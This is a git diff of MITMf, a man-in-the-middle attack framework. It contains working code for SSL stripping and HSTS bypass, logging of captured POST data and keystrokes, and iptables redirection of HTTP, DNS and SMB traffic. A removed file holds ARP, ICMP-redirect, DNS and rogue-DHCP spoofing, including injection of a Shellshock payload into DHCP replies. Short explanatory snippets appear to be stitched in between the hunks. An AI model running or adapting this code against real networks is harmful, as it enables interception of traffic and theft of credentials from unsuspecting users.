self.clientInfo = "%s [type:%s-%s os:%s] " % (self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
except:
self.clientInfo = "%s " % self.client.getClientIP()
mitmf_logger.info(self.clientInfo + "Sending Request: %s" % self.headers['host'])
clientlog.info(self.headers['host'], extra=self.clientInfo)
log.debug("Full request: {}{}".format(self.headers['host'], self.uri))
self.plugins.hook()
self.sendCommand(self.command, self.uri)
def sendHeaders(self):
for header, value in self.headers.iteritems():
mitmf_logger.debug("Sending header: (%s => %s)" % (header, value))
log.debug("Sending header: ({}: {})".format(header, value))
self.sendHeader(header, value)
self.endHeaders()
def sendPostData(self):
if 'clientprfl' in self.uri:
self.plugins.hook()
elif 'keylog' in self.uri:
self.plugins.hook()
else:
mitmf_logger.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
self.transport.write(self.postData)
if self.handle_post_output is False: #So we can disable printing POST data coming from plugins
try:
postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
if len(postdata) > 0:
clientlog.warning("POST Data ({}):\n{}".format(self.headers['host'], postdata), extra=self.clientInfo)
except Exception as e:
if 'UnicodeDecodeError' in e.message or 'UnicodeEncodeError' in e.message:
log.debug("{} Ignored post data from {}".format(self.clientInfo['clientip'], self.headers['host']))
self.handle_post_output = False
self.transport.write(self.postData)
def connectionMade(self):
mitmf_logger.debug("HTTP connection made.")
log.debug("HTTP connection made.")
try:
user_agent = parse(self.headers['user-agent'])
self.clientInfo["clientos"] = user_agent.os.family
self.clientInfo["browser"] = user_agent.browser.family
try:
self.clientInfo["browserv"] = user_agent.browser.version[0]
except IndexError:
self.clientInfo["browserv"] = "Other"
except KeyError:
self.clientInfo["clientos"] = "Other"
self.clientInfo["browser"] = "Other"
self.clientInfo["browserv"] = "Other"
self.clientInfo["clientip"] = self.client.getClientIP()
self.plugins.hook()
self.sendRequest()
self.sendHeaders()
@@ -105,12 +128,17 @@ class ServerConnection(HTTPClient):
self.sendPostData()
def handleStatus(self, version, code, message):
mitmf_logger.debug("Got server response: %s %s %s" % (version, code, message))
values = self.plugins.hook()
version = values['version']
code = values['code']
message = values['message']
log.debug("Server response: {} {} {}".format(version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
mitmf_logger.debug("[ServerConnection] Receiving header: (%s => %s)" % (key, value))
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
if self.app:
@@ -119,15 +147,15 @@ class ServerConnection(HTTPClient):
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
self.isImageRequest = True
mitmf_logger.debug("Response is image content, not scanning...")
log.debug("Response is image content, not scanning")
if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1):
mitmf_logger.debug("Response is compressed...")
log.debug("Response is compressed")
self.isCompressed = True
elif (key.lower()== 'strict-transport-security'):
mitmf_logger.info("%s Zapped a strict-trasport-security header" % self.client.getClientIP())
clientlog.info("Zapped a strict-transport-security header", extra=self.clientInfo)
elif (key.lower() == 'content-length'):
self.contentLength = value
@@ -138,15 +166,22 @@ class ServerConnection(HTTPClient):
else:
self.client.setHeader(key, value)
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
self.client.setHeader("Expires", "0")
self.client.setHeader("Cache-Control", "No-Cache")
if self.length == 0:
self.shutdown()
self.plugins.hook()
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG":
for header, value in self.headers.iteritems():
log.debug("Receiving header: ({}: {})".format(header, value))
if self.length == 0:
self.shutdown()
def handleResponsePart(self, data):
if (self.isImageRequest):
self.client.write(data)
@@ -157,34 +192,35 @@ class ServerConnection(HTTPClient):
if (self.isImageRequest):
self.shutdown()
else:
#Gets rid of some generic errors
try:
HTTPClient.handleResponseEnd(self) #Gets rid of some generic errors
HTTPClient.handleResponseEnd(self)
except:
pass
def handleResponse(self, data):
if (self.isCompressed):
mitmf_logger.debug("Decompressing content...")
log.debug("Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
#mitmf_logger.debug("Read from server:\n" + data)
data = self.replaceSecureLinks(data)
res = self.plugins.hook()
data = res['data']
data = self.plugins.hook()['data']
#log.debug("Read from server {} bytes of data:\n{}".format(len(data), data))
log.debug("Read from server {} bytes of data".format(len(data)))
if (self.contentLength != None):
self.client.setHeader('Content-Length', len(data))
try:
self.client.write(data) #Gets rid of some generic errors
self.client.write(data)
except:
pass
try:
self.shutdown()
except:
mitmf_logger.info("Client connection dropped before request finished.")
log.info("Client connection dropped before request finished.")
def replaceSecureLinks(self, data):
if self.hsts:
@@ -192,32 +228,23 @@ class ServerConnection(HTTPClient):
sustitucion = {}
patchDict = self.urlMonitor.patchDict
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
if patchDict:
dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
mitmf_logger.debug("[ServerConnection][HSTS] Replacing %s => %s"%(url,nuevaurl))
log.debug("Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)
log.debug("Replacing {} => {}".format(url,nuevaurl))
sustitucion[url] = nuevaurl
#data.replace(url,nuevaurl)
#data = self.urlMonitor.DataReemplazo(data)
if len(sustitucion)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys())))
if sustitucion:
dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
#mitmf_logger.debug("HSTS DEBUG received data:\n"+data)
#data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data)
#data = re.sub(ServerConnection.urlTypewww, 'http://w', data)
#if data.find("http://w.face")!=-1:
# mitmf_logger.debug("HSTS DEBUG Found error in modifications")
# raw_input("Press Enter to continue")
#return re.sub(ServerConnection.urlType, 'http://web.', data)
return data
else:
@@ -227,11 +254,11 @@ class ServerConnection(HTTPClient):
for match in iterator:
url = match.group()
mitmf_logger.debug("Found secure reference: " + url)
log.debug("Found secure reference: " + url)
url = url.replace('https://', 'http://', 1)
url = url.replace('&amp;', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)
data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
return re.sub(ServerConnection.urlType, 'http://', data)
@@ -244,5 +271,3 @@ class ServerConnection(HTTPClient):
self.transport.loseConnection()
except:
pass


@@ -17,9 +17,12 @@
#
import logging
from core.logger import logger
from twisted.internet.protocol import ClientFactory
mitmf_logger = logging.getLogger('mimtf')
formatter = logging.Formatter("%(asctime)s [ServerConnectionFactory] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ServerConnectionFactory", formatter)
class ServerConnectionFactory(ClientFactory):
@@ -34,12 +37,12 @@ class ServerConnectionFactory(ClientFactory):
return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
def clientConnectionFailed(self, connector, reason):
mitmf_logger.debug("Server connection failed.")
log.debug("Server connection failed.")
destination = connector.getDestination()
if (destination.port != 443):
mitmf_logger.debug("Retrying via SSL")
log.debug("Retrying via SSL")
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
else:
try:


@@ -19,9 +19,13 @@
import re, os
import logging
mitmf_logger = logging.getLogger('mimtf')
from core.configwatcher import ConfigWatcher
from core.logger import logger
class URLMonitor:
formatter = logging.Formatter("%(asctime)s [URLMonitor] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("URLMonitor", formatter)
class URLMonitor:
'''
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
@@ -31,8 +35,8 @@ class URLMonitor:
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
sustitucion = {} # LEO: diccionario host / sustitucion
real = {} # LEO: diccionario host / real
sustitucion = dict()
real = dict()
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
@@ -46,9 +50,7 @@ class URLMonitor:
self.faviconReplacement = False
self.hsts = False
self.app = False
self.hsts_config = None
self.resolver = 'dnschef'
self.resolverport = 53
self.caching = False
@staticmethod
def getInstance():
@@ -57,21 +59,9 @@ class URLMonitor:
return URLMonitor._instance
#This is here because I'm lazy
def setResolver(self, resolver):
self.resolver = str(resolver).lower()
#This is here because I'm lazy
def getResolver(self):
return self.resolver
#This is here because I'm lazy
def setResolverPort(self, port):
self.resolverport = int(port)
#This is here because I'm lazy
def getResolverPort(self):
return self.resolverport
return int(ConfigWatcher().config['MITMf']['DNS']['port'])
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
@@ -86,13 +76,16 @@ class URLMonitor:
else:
return 443
def setCaching(self, value):
self.caching = value
def addRedirection(self, from_url, to_url):
for s in self.redirects:
if from_url in s:
s.add(to_url)
return
url_set = set([from_url, to_url])
mitmf_logger.debug("[URLMonitor][AppCachePoison] Set redirection: %s" % url_set)
log.debug("Set redirection: {}".format(url_set))
self.redirects.append(url_set)
def getRedirectionSet(self, url):
@@ -123,6 +116,8 @@ class URLMonitor:
port = 443
if self.hsts:
self.updateHstsConfig()
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
@ -131,10 +126,9 @@ class URLMonitor:
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
mitmf_logger.debug("[URLMonitor][HSTS] SSL host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
log.debug("SSL host ({}) tokenized ({})".format(host, self.sustitucion[host]))
url = 'http://' + host + path
#mitmf_logger.debug("HSTS stripped URL: %s %s"%(client, url))
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
@@ -150,40 +144,32 @@ class URLMonitor:
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
def setHstsBypass(self, hstsconfig):
self.hsts = True
self.hsts_config = hstsconfig
for k,v in self.hsts_config.iteritems():
def updateHstsConfig(self):
for k,v in ConfigWatcher().config['SSLstrip+'].iteritems():
self.sustitucion[k] = v
self.real[v] = k
def setHstsBypass(self):
self.hsts = True
def setAppCachePoisoning(self):
self.app = True
def setClientLogging(self, clientLogging):
self.clientLogging = clientLogging
def isFaviconSpoofing(self):
return self.faviconSpoofing
def isClientLogging(self):
return self.clientLogging
def isHstsBypass(self):
return self.hsts
def isAppCachePoisoning(self):
return self.app
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self, host):
mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: %s"% host)
log.debug("Parsing host: {}".format(host))
self.updateHstsConfig()
if self.real.has_key(host):
mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: %s"% self.real[host])
log.debug("Found host in list: {}".format(self.real[host]))
return self.real[host]
else:
mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: %s"% host)
log.debug("Host not in list: {}".format(host))
return host
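Putting the tokenization together: for a non-www host the stripped name is simply "web" + host, and URLgetRealHost undoes it through the real dict; a toy illustration (hostname is made up):
sustitucion, real = {}, {}
host = 'mail.example.com'
sustitucion[host] = "web" + host       # clients are handed links pointing at webmail.example.com
real["web" + host] = host
print real['webmail.example.com']      # -> mail.example.com  (what URLgetRealHost looks up)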


@@ -1,6 +1,3 @@
#! /usr/bin/env python2.7
# -*- coding: utf-8 -*-
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
@@ -20,108 +17,86 @@
#
import os
import random
import linecache
import logging
import re
import sys
def PrintException():
exc_type, exc_obj, tb = sys.exc_info()
f = tb.tb_frame
lineno = tb.tb_lineno
filename = f.f_code.co_filename
linecache.checkcache(filename)
line = linecache.getline(filename, lineno, f.f_globals)
return '({}, LINE {} "{}"): {}'.format(filename, lineno, line.strip(), exc_obj)
from core.logger import logger
from core.proxyplugins import ProxyPlugins
from scapy.all import get_if_addr, get_if_hwaddr, get_working_if
class SystemConfig:
formatter = logging.Formatter("%(asctime)s [Utils] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("Utils", formatter)
@staticmethod
def setIpForwarding(value):
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
file.write(str(value))
file.close()
def shutdown(message=None):
for plugin in ProxyPlugins().plugin_list:
plugin.on_shutdown()
sys.exit(message)
class IpTables:
def set_ip_forwarding(value):
log.debug("Setting ip forwarding to {}".format(value))
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
file.write(str(value))
file.close()
_instance = None
def get_iface():
iface = get_working_if()
log.debug("Interface {} seems to be up and running".format(iface))
return iface
def __init__(self):
self.dns = False
self.http = False
def get_ip(interface):
try:
ip_address = get_if_addr(interface)
if (ip_address == "0.0.0.0") or (ip_address is None):
shutdown("Interface {} does not have an assigned IP address".format(interface))
@staticmethod
def getInstance():
if IpTables._instance == None:
IpTables._instance = IpTables()
return ip_address
except Exception as e:
shutdown("Error retrieving IP address from {}: {}".format(interface, e))
return IpTables._instance
def get_mac(interface):
try:
mac_address = get_if_hwaddr(interface)
return mac_address
except Exception as e:
shutdown("Error retrieving MAC address from {}: {}".format(interface, e))
def Flush(self):
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
self.dns = False
self.http = False
class iptables:
def HTTP(self, http_redir_port):
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % http_redir_port)
self.http = True
dns = False
http = False
smb = False
nfqueue = False
def DNS(self, ip, port):
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to %s:%s' % (ip, port))
self.dns = True
__shared_state = {}
class Banners:
def __init__(self):
self.__dict__ = self.__shared_state
banner1 = """
__ __ ___ .--. __ __ ___
| |/ `.' `. |__| | |/ `.' `. _.._
| .-. .-. '.--. .| | .-. .-. ' .' .._|
| | | | | || | .' |_ | | | | | | | '
| | | | | || | .' || | | | | | __| |__
| | | | | || |'--. .-'| | | | | ||__ __|
| | | | | || | | | | | | | | | | |
|__| |__| |__||__| | | |__| |__| |__| | |
| '.' | |
| / | |
`'-' |_|
"""
def flush(self):
log.debug("Flushing iptables")
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
self.dns = False
self.http = False
self.smb = False
self.nfqueue = False
banner2= """
"""
def HTTP(self, http_redir_port):
log.debug("Setting iptables HTTP redirection rule from port 80 to {}".format(http_redir_port))
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port))
self.http = True
banner3 = """
"""
def DNS(self, dns_redir_port):
log.debug("Setting iptables DNS redirection rule from port 53 to {}".format(dns_redir_port))
os.system('iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port {}'.format(dns_redir_port))
self.dns = True
banner4 = """
___ ___ ___
/\ \ /\ \ /\__\
|::\ \ ___ ___ |::\ \ /:/ _/_
|:|:\ \ /\__\ /\__\ |:|:\ \ /:/ /\__\
__|:|\:\ \ /:/__/ /:/ / __|:|\:\ \ /:/ /:/ /
/::::|_\:\__\ /::\ \ /:/__/ /::::|_\:\__\ /:/_/:/ /
\:\~~\ \/__/ \/\:\ \__ /::\ \ \:\~~\ \/__/ \:\/:/ /
\:\ \ ~~\:\/\__\ /:/\:\ \ \:\ \ \::/__/
\:\ \ \::/ / \/__\:\ \ \:\ \ \:\ \
\:\__\ /:/ / \:\__\ \:\__\ \:\__\
\/__/ \/__/ \/__/ \/__/ \/__/
"""
def SMB(self, smb_redir_port):
log.debug("Setting iptables SMB redirection rule from port 445 to {}".format(smb_redir_port))
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 445 -j REDIRECT --to-port {}'.format(smb_redir_port))
self.smb = True
def printBanner(self):
banners = [self.banner1, self.banner2, self.banner3, self.banner4]
print random.choice(banners)
def NFQUEUE(self):
log.debug("Setting iptables NFQUEUE rule")
os.system('iptables -I FORWARD -j NFQUEUE --queue-num 0')
self.nfqueue = True
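A minimal sketch of how this helper would be driven (the redirection ports are hypothetical; the methods shell out to iptables, so root is required):
redir = iptables()
redir.HTTP(10000)     # tcp/80  -> 10000
redir.DNS(10053)      # udp/53  -> 10053
redir.SMB(10445)      # tcp/445 -> 10445
redir.NFQUEUE()       # send forwarded packets to NFQUEUE 0
# ... later, on shutdown ...
redir.flush()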


@@ -1,378 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import threading
import binascii
import random
#import dns.resolver
from base64 import b64decode
from urllib import unquote
from time import sleep
#from netfilterqueue import NetfilterQueue
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import *
mitmf_logger = logging.getLogger('mitmf')
class _DHCP():
def __init__(self, interface, dhcpcfg, ip, mac):
self.interface = interface
self.ip_address = ip
self.mac_address = mac
self.shellshock = None
self.debug = False
self.dhcpcfg = dhcpcfg
self.rand_number = []
self.dhcp_dic = {}
def start(self):
t = threading.Thread(name="dhcp_spoof", target=self.dhcp_sniff, args=(self.interface,))
t.setDaemon(True)
t.start()
def dhcp_sniff(self, interface):
sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=interface)
def dhcp_rand_ip(self):
pool = self.dhcpcfg['ip_pool'].split('-')
trunc_ip = pool[0].split('.'); del(trunc_ip[3])
max_range = int(pool[1])
min_range = int(pool[0].split('.')[3])
number_range = range(min_range, max_range)
for n in number_range:
if n in self.rand_number:
number_range.remove(n)
rand_number = random.choice(number_range)
self.rand_number.append(rand_number)
rand_ip = '.'.join(trunc_ip) + '.' + str(rand_number)
return rand_ip
def dhcp_callback(self, resp):
if resp.haslayer(DHCP):
xid = resp[BOOTP].xid
mac_addr = resp[Ether].src
raw_mac = binascii.unhexlify(mac_addr.replace(":", ""))
if xid in self.dhcp_dic.keys():
client_ip = self.dhcp_dic[xid]
else:
client_ip = self.dhcp_rand_ip()
self.dhcp_dic[xid] = client_ip
if resp[DHCP].options[0][1] is 1:
mitmf_logger.info("Got DHCP DISCOVER from: " + mac_addr + " xid: " + hex(xid))
mitmf_logger.info("Sending DHCP OFFER")
packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
IP(src=self.ip_address, dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
DHCP(options=[("message-type", "offer"),
('server_id', self.ip_address),
('subnet_mask', self.dhcpcfg['subnet']),
('router', self.ip_address),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
"end"]))
try:
packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server'])))
except KeyError:
pass
sendp(packet, iface=self.interface, verbose=self.debug)
if resp[DHCP].options[0][1] == 3:
mitmf_logger.info("Got DHCP REQUEST from: " + mac_addr + " xid: " + hex(xid))
packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
IP(src=self.ip_address, dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
DHCP(options=[("message-type", "ack"),
('server_id', self.ip_address),
('subnet_mask', self.dhcpcfg['subnet']),
('router', self.ip_address),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240)]))
try:
packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server'])))
except KeyError:
pass
if self.shellshock:
mitmf_logger.info("Sending DHCP ACK with shellshock payload")
packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.shellshock)))
packet[DHCP].options.append("end")
else:
mitmf_logger.info("Sending DHCP ACK")
packet[DHCP].options.append("end")
sendp(packet, iface=self.interface, verbose=self.debug)
class _ARP():
def __init__(self, gateway, interface, mac):
self.gateway = gateway
self.gatewaymac = getmacbyip(gateway)
self.mac = mac
self.target = None
self.targetmac = None
self.interface = interface
self.arpmode = 'req'
self.debug = False
self.send = True
self.arp_inter = 3
def start(self):
if self.gatewaymac is None:
sys.exit("[-] Error: Could not resolve gateway's MAC address")
if self.target:
self.targetmac = getmacbyip(self.target)
if self.targetmac is None:
sys.exit("[-] Error: Could not resolve target's MAC address")
if self.arpmode == 'req':
pkt = self.build_arp_req()
elif self.arpmode == 'rep':
pkt = self.build_arp_rep()
t = threading.Thread(name='arp_spoof', target=self.send_arps, args=(pkt, self.interface, self.debug,))
t.setDaemon(True)
t.start()
def send_arps(self, pkt, interface, debug):
while self.send:
sendp(pkt, inter=self.arp_inter, iface=interface, verbose=debug)
def stop(self):
self.send = False
sleep(3)
self.arp_inter = 1
if self.target:
print "\n[*] Re-ARPing target"
self.reARP_target(5)
print "\n[*] Re-ARPing network"
self.reARP_net(5)
def build_arp_req(self):
if self.target is None:
pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, psrc=self.gateway, pdst=self.gateway)
elif self.target:
pkt = Ether(src=self.mac, dst=self.targetmac)/\
ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=self.targetmac, pdst=self.target)
return pkt
def build_arp_rep(self):
if self.target is None:
pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, psrc=self.gateway, op=2)
elif self.target:
pkt = Ether(src=self.mac, dst=self.targetmac)/\
ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=self.targetmac, pdst=self.target, op=2)
return pkt
def reARP_net(self, count):
pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/\
ARP(psrc=self.gateway, hwsrc=self.gatewaymac, op=2)
sendp(pkt, inter=self.arp_inter, count=count, iface=self.interface)
def reARP_target(self, count):
pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/\
ARP(psrc=self.target, hwsrc=self.targetmac, op=2)
sendp(pkt, inter=self.arp_inter, count=count, iface=self.interface)
class _ICMP():
def __init__(self, interface, target, gateway, ip_address):
self.target = target
self.gateway = gateway
self.interface = interface
self.ip_address = ip_address
self.debug = False
self.send = True
self.icmp_interval = 2
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
def start(self):
pkt = self.build_icmp()
t = threading.Thread(name='icmp_spoof', target=self.send_icmps, args=(pkt, self.interface, self.debug,))
t.setDaemon(True)
t.start()
def stop(self):
self.send = False
sleep(3)
def send_icmps(self, pkt, interface, debug):
while self.send:
sendp(pkt, inter=self.icmp_interval, iface=interface, verbose=debug)
"""
class _DNS():
hsts = False
dns = False
hstscfg = None
dnscfg = None
_instance = None
nfqueue = None
queue_number = 0
def __init__(self):
self.nfqueue = NetfilterQueue()
t = threading.Thread(name='nfqueue', target=self.bind, args=())
t.setDaemon(True)
t.start()
@staticmethod
def getInstance():
if _DNS._instance is None:
_DNS._instance = _DNS()
return _DNS._instance
@staticmethod
def checkInstance():
if _DNS._instance is None:
return False
else:
return True
def bind(self):
self.nfqueue.bind(self.queue_number, self.callback)
self.nfqueue.run()
def stop(self):
try:
self.nfqueue.unbind()
except:
pass
def enableHSTS(self, config):
self.hsts = True
self.hstscfg = config
def enableDNS(self, config):
self.dns = True
self.dnscfg = config
def resolve_domain(self, domain):
try:
mitmf_logger.debug("Resolving -> %s" % domain)
answer = dns.resolver.query(domain, 'A')
real_ips = []
for rdata in answer:
real_ips.append(rdata.address)
if len(real_ips) > 0:
return real_ips
except Exception:
mitmf_logger.info("Error resolving " + domain)
def callback(self, payload):
try:
#mitmf_logger.debug(payload)
pkt = IP(payload.get_payload())
if not pkt.haslayer(DNSQR):
payload.accept()
return
if pkt.haslayer(DNSQR):
mitmf_logger.debug("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype))
if self.dns:
for k, v in self.dnscfg.items():
if k in pkt[DNSQR].qname:
self.modify_dns(payload, pkt, v)
return
payload.accept()
elif self.hsts:
if (pkt[DNSQR].qtype == 28 or pkt[DNSQR].qtype == 1): # AAAA or A query
for k,v in self.hstscfg.items():
if v == pkt[DNSQR].qname[:-1]:
ip = self.resolve_domain(k)
if ip:
self.modify_dns(payload, pkt, ip)
return
if 'wwww' in pkt[DNSQR].qname:
ip = self.resolve_domain(pkt[DNSQR].qname[1:-1])
if ip:
self.modify_dns(payload, pkt, ip)
return
if 'web' in pkt[DNSQR].qname:
ip = self.resolve_domain(pkt[DNSQR].qname[3:-1])
if ip:
self.modify_dns(payload, pkt, ip)
return
payload.accept()
except Exception, e:
print "Exception occurred in nfqueue callback: " + str(e)
def modify_dns(self, payload, pkt, ip):
try:
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd)
if self.hsts:
spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip[0]); del ip[0] #have to do this first to initialize the an field
for i in ip:
spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i))
mitmf_logger.info("%s Resolving %s for HSTS bypass (DNS)" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
payload.set_payload(str(spoofed_pkt))
payload.accept()
if self.dns:
spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip)
mitmf_logger.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
payload.set_payload(str(spoofed_pkt))
payload.accept()
except Exception, e:
print "Exception occurred while modifying DNS: " + str(e)
"""

@@ -1 +1 @@
Subproject commit e6af51b0c921e7c3dd5bb10a0d7b3983f46ca32b
Subproject commit d2f352139f23ed642fa174211eddefb95e6a8586

@@ -1 +0,0 @@
Subproject commit 9707672de62bd42f651fabc6f9d368d7a67b4d99

@@ -1 +0,0 @@
Subproject commit 137e8eea61ef3c3d0426312a72894d6a4ed32cef

BIN
lock.ico
Binary file not shown (changed: 1.1 KiB before, 558 B after).

3
logs/.gitignore vendored
@@ -1,4 +1,5 @@
*
!.gitignore
!responder/
!dnschef/
!dns/
!ferret-ng/

2
logs/ferret-ng/.gitignore vendored Normal file
@@ -0,0 +1,2 @@
*
!.gitignore

260
mitmf.py
@@ -18,194 +18,166 @@
# USA
#
import sys
import argparse
import os
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message
import argparse
import sys
import os
import threading
import core.responder.settings as settings
from argparse import RawTextHelpFormatter
from twisted.web import http
from twisted.internet import reactor
from core.sslstrip.CookieCleaner import CookieCleaner
from core.sergioproxy.ProxyPlugins import ProxyPlugins
from core.utils import Banners
from core.utils import PrintException
from configobj import ConfigObj
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import get_if_addr, get_if_hwaddr
from core.logger import logger
from core.banners import get_banner
from plugins import *
plugin_classes = plugin.Plugin.__subclasses__()
try:
import user_agents
except ImportError:
print "[-] user_agents library missing! User-Agent parsing will be disabled!"
print get_banner()
mitmf_version = "0.9.6"
sslstrip_version = "0.9"
sergio_version = "0.2.1"
dnschef_version = "0.4"
Banners().printBanner()
mitmf_version = '0.9.8'
mitmf_codename = 'The Dark Side'
if os.geteuid() != 0:
sys.exit("[-] When man-in-the-middle you want, run as r00t you will, hmm?")
sys.exit("[-] The derp is strong with this one\nTIP: you may run MITMf as root.")
parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_version, mitmf_codename),
version="{} - '{}'".format(mitmf_version, mitmf_codename),
usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]',
epilog="Use wisely, young Padawan.",
formatter_class=RawTextHelpFormatter)
parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, version=mitmf_version, usage='', epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
#add MITMf options
mgroup = parser.add_argument_group("MITMf", "Options for MITMf")
mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
mgroup.add_argument("-i", "--interface", required=True, type=str, metavar="interface" ,help="Interface to listen on")
